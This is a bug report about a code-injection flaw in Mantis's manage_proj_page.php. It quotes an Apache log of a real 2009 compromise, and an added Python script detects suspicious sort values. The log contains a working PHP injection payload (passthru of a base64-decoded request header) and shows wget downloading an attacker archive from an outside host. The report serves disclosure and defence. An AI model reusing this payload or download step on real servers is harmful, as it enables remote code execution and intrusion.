security issues with manage_proj_page.php
Bug #345988 reported by Kees Cook
This bug report is a duplicate of:
Bug #481631: mantis1.0.8-4 (ubuntu 8.04) vulnerable to remote exploit.
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| mantis (Debian) | Unknown | Unknown | | |
| mantis (Ubuntu) | Confirmed | Undecided | Unassigned | |
Bug Description
Binary package hint: mantis
CVE References
visibility: private → public
Changed in mantis (Ubuntu):
status: New → Confirmed
This bug has been actively exploited on a hardy machine running mantis 1.0.6 on Feb 4th 2009, as it was noticed today.
Because of the LTS for hardy the vendor patch should be applied here too.
<APACHE LOG>
IP - - [04/Feb/2009:19:32:48 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 302 - "-" "-"
IP - - [04/Feb/2009:19:32:49 +0100] "POST /mantis/login.php HTTP/1.0" 302 - "-" "-"
IP - - [04/Feb/2009:19:32:50 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3350 "-" "-"
IP - - [04/Feb/2009:19:32:53 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3218 "-" "-"
IP - - [04/Feb/2009:19:33:01 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3605 "-" "-"
IP - - [04/Feb/2009:19:33:19 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3809 "-" "-"
--19:33:01-- http://www.freewebs.com/spaniola/new.tgz
=> `new.tgz'
Resolving www.freewebs.com... 204.2.183.2
Connecting to www.freewebs.com|204.2.183.2|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 248,497 (243K) [application/x-tar]
0K .......... .......... .......... .......... .......... 20% 58.65 KB/s
50K .......... .......... .......... .......... .......... 41% 58.78 KB/s
100K .......... .......... .......... .......... .......... 61% 51.43 KB/s
150K .......... .......... .......... .......... .......... 82% 43.37 KB/s
200K .......... .......... .......... .......... .. 100% 45.68 KB/s
19:33:07 (50.96 KB/s) - `new.tgz' saved [248497/248497]
</APACHE LOG>
The problem seems to be fixed in version 1.1.4.
Intrepid is shipping 1.1.2. Has the vendor patch been applied to that version?
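
Added example (not part of the bug report or of Mantis): a Python check that scans Apache access-log lines for `sort` values on manage_proj_page.php that are not a bare column name, which is the request pattern in the log quoted above. The allowlist, the `dir` parameter and the sample lines (documentation-range addresses, payload replaced by a placeholder) are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache common/combined log prefix. The target is matched greedily so that
# spaces inside an injected value do not cut the request line short.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) '
)
# Assumption: a legitimate sort value is a bare column name.
SAFE_SORT = re.compile(r'[A-Za-z0-9_]{1,32}')
SCRIPT = "/manage_proj_page.php"


def suspicious_sort_requests(lines):
    """Return (time, host, status, decoded sort) for non-allowlisted values."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line (e.g. interleaved wget output)
        url = urlsplit(m["target"])
        if not url.path.endswith(SCRIPT):
            continue
        # Split on '&' by hand: an injected value may itself contain ';'.
        for pair in url.query.split("&"):
            key, _, raw = pair.partition("=")
            value = unquote_plus(raw)
            if unquote_plus(key) == "sort" and not SAFE_SORT.fullmatch(value):
                hits.append((m["time"], m["host"], int(m["status"]), value))
    return hits


# Constructed sample lines; PLACEHOLDER stands in for the injected code.
SAMPLE_LOG = r'''
192.0.2.10 - - [04/Feb/2009:19:32:48 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 302 - "-" "-"
192.0.2.10 - - [04/Feb/2009:19:32:49 +0100] "POST /mantis/login.php HTTP/1.0" 302 - "-" "-"
192.0.2.10 - - [04/Feb/2009:19:32:50 +0100] "GET /mantis/manage_proj_page.php?sort=x']);PLACEHOLDER();%23 HTTP/1.0" 200 3350 "-" "-"
198.51.100.7 - - [04/Feb/2009:20:10:02 +0100] "GET /mantis/manage_proj_page.php?sort=name&dir=ASC HTTP/1.1" 200 5120 "-" "-"
198.51.100.9 - - [04/Feb/2009:20:11:30 +0100] "GET /mantis/manage_proj_page.php?dir=ASC&sort=name%27%5D HTTP/1.1" 200 3301 "-" "-"
'''.strip().splitlines()

if __name__ == "__main__":
    for hit in suspicious_sort_requests(SAMPLE_LOG):
        print(*hit, sep="  ")
```

The status code is returned with each hit because, in the log above, the request made before login was answered with 302 and the requests after login with 200.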